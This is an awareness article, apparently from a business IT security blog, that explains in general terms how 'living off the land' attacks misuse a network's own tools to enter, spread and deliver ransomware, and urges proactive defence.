Cyber Attacks - The Rise of Living off the Land Attacks

Living off the land used to mean fending for yourself on the frontier but now in the digital age, it has a much more sinister definition. Imagine your security network as being a multi-layered and well-oiled machine that can fight off malicious attacks or halt them from spreading should they gain entry. For example, if a hacker gains access to one part of your network, that does not mean that the hacker can gain access to everything. This is great for mitigating damage from unsecured areas, but living off the land (LotL) attacks are a bit nastier and can bypass this entirely. 

What is LotL? 

LotL works by using a network’s tools against itself. In other words, an attacker can extend its reach within a network by using the network’s own resources. This means that an attacker does not have to externally download malware into a computer or network and can instead use the network itself as its weapon. This is also known as a “zero-footprint” or “fileless” because no trail is left for any anti-virus to pick up on. This makes LotL attacks hard to detect with traditional anti-virus software and thus makes it stealthy and potentially more dangerous.

With this method, a person or people attacking your network can move through the entire system in place and can connect to any other machines that are also hooked up to it. All of these factors combined make LotL attacks highly effective. These types of attacks are not only stealthy to your security systems in place, but move fast and can go through many interconnected machines with minimal interference and with people hardly noticing. 

What Exactly is Attacked? 

When attacking a network, often times hackers and other unsavory individuals will seek to exploit any weaknesses or use alternative methods to breach. 

• Using a memory only approach allows for infections to breach directly into a device’s memory, and while they can be removed with a restart, an unpatched computer is at constant risk for reinfection over and over again.
• Another approach is fileless persistence which involves storing malicious information on the registry, not in the memory, where its effects can remain hidden and last even after a system reboot.  

• Non-portable executable file attacks affect areas such as javascript, power shell, and Microsoft Office documents with macros or scripts. Malicious infection remains inside of legitimate tools. 
• Lastly, the final area that could be attacked are dual-use tools such as PsExec and other systems that have a legitimate purpose in office workflows. These are often targeted because they can bypass file scanning and other methods of protection. 

How Does it Happen?

LotL attacks happen in many ways but typically they occur in this progression: the attacker enters the network, the attacker moves through the system, and then the damage is dealt. 

Entering the network occurs when attackers decide to use system tools, applications, or other typically unguarded areas of a network to gain access. They can also gain access through malicious emails or stolen/guessed passwords, i.e. phishing. A company’s third-party applications like a VPN or trusted off-the-shelf programs that come installed on the computer are targeted because they are often not the focus of a security network and because using these tools to gain access adds a layer of protection and stealth to the attacker. These tools also usually have system administrator privileges and are used commonly throughout an office, so activity coming from these tools are usually done without any notice. A LotL will hide in plain sight and continue on to travel up the network hierarchy. 

A LotL attack will go through the network up the food chain. It is looking for the cookie jar, the place where data can be stolen or operations can be damaged. By creating new administrator accounts and going through each computer, a LotL attack is solidifying its place within the network it has compromised and allowing itself supreme access throughout the system. This kind of attack will also likely change administrator settings furthering its control and protection for its final step. 

The final step is for the attacker or attackers to ultimately do what they wanted in the first place by breaching your network. Usually, attachers go for identity theft which leads to major damage to your office’s work capabilities and equipment. However, over the past 18 months, there has been a recent shift from identity theft to ransomware.

There have been cases where a company brags about the amount of cybersecurity insurance they carry only to be ransomed for that exact amount. As long as the LotL attack still retains administrator privileges or is still lingering in the network, there is always a risk.

Attackers Never Sleep

Cyber-security is always changing. There is never a consistent way attackers will seek to exploit secure networks. LotL style attacks are growing since they are highly effective and are great ways attackers can bypass and circumvent the strengthening of modern security networks. It is important to understand that just because you have a strong network it is not good to let your guard down because of it. This style of attack is a direct counter for those who decide not to be proactive in their network defense. LotL attacks are on the rise and is becoming the next preferred method of attack. By knowing of LotL and how it operates you have the best chance at defending your personal information and keeping your office secured.